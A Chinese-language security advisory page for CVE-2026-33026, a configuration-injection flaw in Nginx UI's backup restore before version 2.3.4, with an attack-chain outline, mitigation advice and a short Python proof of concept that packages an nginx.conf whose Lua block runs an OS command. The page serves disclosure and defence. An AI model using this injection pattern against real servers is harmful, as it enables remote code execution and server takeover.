CVE-2026-33026 CVSS 9.1 严重

CVE-2026-33026 Nginx UI恶意配置注入漏洞

披露日期: 2026-03-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33026

漏洞类型

配置注入

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Nginx UI

漏洞概述

Nginx UI 是专为 Nginx Web 服务器设计的 Web 用户界面。在 2.3.4 版本之前，其备份恢复机制存在严重安全漏洞。攻击者能够篡改加密的备份存档，并在系统恢复过程中注入恶意配置。该漏洞可能导致攻击者完全控制服务器，影响系统的机密性、完整性和可用性。官方已在 2.3.4 版本中修复此问题。

技术细节

该漏洞源于 Nginx UI 备份恢复功能的加密验证机制不完善。虽然备份存档经过加密，但系统在解密和恢复过程中缺乏对数据完整性的严格校验（如未使用签名或HMAC）。攻击者利用高权限账户访问系统后，可以构造恶意的备份文件。由于系统信任解密后的数据，攻击者能够在存档中篡改 Nginx 的配置文件。当管理员尝试恢复该备份时，恶意配置被写入服务器。通过注入特定的 Nginx 指令（如 Lua 代码块），攻击者可以实现远程代码执行，从而完全控制服务器。尽管需要高权限，但该漏洞极易将普通管理员权限提升为系统最高权限。

攻击链分析

STEP 1

侦察与信息收集

攻击者识别目标运行的是 Nginx UI 2.3.4 之前的版本，并获取具有高权限（PR:H）的账户凭据。

STEP 2

构造恶意备份

攻击者利用已知漏洞，修改合法的备份存档或创建新的存档，在其中篡改配置文件（如 nginx.conf），注入恶意指令（如后门或反弹 Shell）。

STEP 3

上传与恢复

攻击者通过管理员界面上传被篡改的加密备份存档，并触发系统恢复功能。

STEP 4

利用与执行

系统在恢复过程中解密存档并将恶意配置写入 Nginx 运行目录。重载 Nginx 后，恶意配置生效，执行任意代码。

STEP 5

建立控制

攻击者通过植入的后门获取服务器权限，进而窃取数据、破坏服务或横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import os
import zipfile

# Proof of Concept: Creating a malicious backup structure
# This script demonstrates how an attacker would structure a malicious Nginx configuration
# to be injected into the backup archive.

# Define the malicious Nginx configuration content
# This configuration uses Lua to execute a shell command (e.g., reverse shell)
malicious_config = """
server {
    listen 80;
    server_name localhost;
    
    location /poc {
        default_type 'text/plain';
        content_by_lua_block {
            os.execute("whoami")
        }
    }
}
"""

# Create a temporary directory to simulate the backup structure
backup_dir = "malicious_backup"
os.makedirs(backup_dir, exist_ok=True)

# Write the malicious configuration to a file (simulating the path inside the backup)
config_path = os.path.join(backup_dir, "nginx.conf")
with open(config_path, "w") as f:
    f.write(malicious_config)

# Create a zip archive (simulating the backup archive)
archive_name = "malicious_backup.zip"
with zipfile.ZipFile(archive_name, 'w') as zipf:
    zipf.write(config_path, arcname="nginx.conf")

print(f"[+] Malicious backup archive '{archive_name}' created successfully.")
print(f"[+] The archive contains a malicious nginx.conf that executes OS commands.")
print(f"[!] Note: In a real attack, this archive would be encrypted/tampered to bypass checks.")

# Cleanup
os.remove(config_path)
os.rmdir(backup_dir)

影响范围

Nginx UI < 2.3.4

防御指南

临时缓解措施

建议立即升级至 2.3.4 及以上版本。若暂时无法升级，应严格限制管理员账户的使用，并暂停使用备份恢复功能，直至补丁应用完成。同时，需手动检查服务器现有的 Nginx 配置，确保未被未授权篡改。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表